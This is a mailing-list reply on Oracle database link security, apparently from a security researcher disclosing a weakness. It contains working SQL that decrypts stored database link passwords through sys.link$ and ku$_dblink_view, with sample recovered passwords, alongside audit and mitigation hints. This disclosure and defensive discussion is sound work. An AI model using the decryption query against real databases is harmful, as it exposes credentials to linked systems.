Re: Database Link Security et al

From: <oracle_at_ukcert.org.uk>
Date: Wed, 28 Nov 2012 17:18:34 +0000 (GMT)
Message-ID: <KZ5Su4Ix.1354123114.5145060.oracle_at_ukcert.org.uk>

Hi ****

Your question below is a good one, as I have had a number of other direct offline emails about the same topic since my original posting, which I will answer here in one go.

The solution proposed of restricting access to sys.link$ is the well known remediation - but it does not solve this issue unfortunately, as you will see below the dblink ciphertexts are selectable through ku$_dblink_view as well, hence the wider visibility of the link passwords.

SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view;

NAME

USERID

PASSWD

TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

(11.2.0.1)

I will be presenting additional new research, exclusive to UKOUG, on Monday.

Cheers,
Paul
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62

On 11/27/2012, "********" <*********_at_*****.com> wrote:

>Hi Paul
>Could you share the paper if that is ok.
>I am interested in the automated solution for the db link security issue.
>ONe thing is basically restrict access to link$.
>
>Thank you
>****
>
>
>
>On Sun, Nov 25, 2012 at 12:18 PM, <oracle_at_ukcert.org.uk> wrote:
>
>>
>> So, users can decrypt dblink passwords as the key is included in the
>> ciphertext... -->
>>
>> SQL> select name, userid,
>> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
>> 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';
>>
>> NAME
>>
>> --------------------------------------------------------------------------------
>> USERID
>> ------------------------------
>> PASSWORD
>>
>> --------------------------------------------------------------------------------
>> TEST_LINK
>> DBLINK_ACCOUNT
>> MYPW
>>
>> ..one saving grace is that we can now identify incoming db links using
>> this..
>>
>> select userid, terminal, comment$text from sys.aud$ where comment$text
>> like 'DBLINK%';
>> USERID NTIMESTAMP# USERHOST COMMENT$TEXT
>> ------------ ----------------- ------- --------------
>> DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO:
>> (SOURCE_GLOBAL_NAME=orcl.4294967295)
>>
>> -->could be too late though so best to take a few precautions in
>> advance... preferably automated...
>>
>> ..Same with lack of profiles on SYS account. Sometimes easier to fix
>> ourselves..
>>
>> create or replace trigger sys_throttler.tra_servererror_ora1017
>> after servererror on database
>> declare
>> l_db_usr varchar2 (32);

--
http://www.freelists.org/webpage/oracle-l

Received on Wed Nov 28 2012 - 18:18:34 CET

This message: [ Message body ]
Next message: John Hallas: "RE: ASM question !"
Previous message: Rich Jesse: "Re: Oracle Home naming convention"
Maybe in reply to: oracle_at_ukcert.org.uk: "Database Link Security et al"
Next in thread: Powell, Mark: "RE: Database Link Security et al"
Reply: Powell, Mark: "RE: Database Link Security et al"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ]

Original text of this message